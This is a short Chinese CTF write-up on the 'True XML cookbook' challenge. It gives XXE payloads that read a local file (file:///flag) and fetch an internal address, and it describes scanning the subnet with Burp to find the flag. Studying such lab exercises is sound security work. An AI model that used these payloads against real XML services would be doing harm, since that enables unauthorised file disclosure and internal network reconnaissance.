True XML cookbook

worker..2024-08-26 1:38

打开题目

看到登录口

随便输入admin,123456,然后抓包试一下

先按原来那道题的payload进行测试,payload和结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "file:///flag">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "http://10.244.80.49/">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:

扫描可得到flag

相关推荐
阿亮爱学代码1 天前
初识Android界面布局
android·xml·view·viewgroup
eSsO KERF2 天前
使用 Logback 的最佳实践:`logback.xml` 与 `logback-spring.xml` 的区别与用法
xml·spring·logback
麻辣璐璐3 天前
EditText属性运用之适配RTL语言和LTR语言的输入习惯
android·xml·java·开发语言·安卓
awei09164 天前
MinIO配置自定义crossdomain.xml跨域策略(Nginx反向代理实现)
xml·java·nginx
那个失眠的夜6 天前
Spring 的纯注解配置
xml·java·数据库·后端·spring·junit
mobai76 天前
使用pyang将yang模型转换为xml
xml·运维·服务器
我不是8神6 天前
xml配置文件知识点总结
xml
一叶龙洲8 天前
Java中使用模板引擎(FreeMarker / Velocity) + Word XML导出复杂Word
xml·java·word
Mike_6669 天前
txt_json和xml_json
xml·python·json
20YC编程社区9 天前
一分钟了解XML语言格式,使用场景,和它的优缺点
xml
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free04Claude Code Windows 兼容性问题:指定版本 2.1.112 可解决052026年4月AI大事件深度解读:大模型竞争进入“深水区“06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07UBUNTU Claude Code 报错 claude native binary not installed08从限购到畅通:GLM-5.1 Coding Plan接入攻略09GPT-6发布日深度解析-Symphony架构200万Token实战10从零部署 Hermes Agent:一只"会成长的 AI 马"保姆级安装教程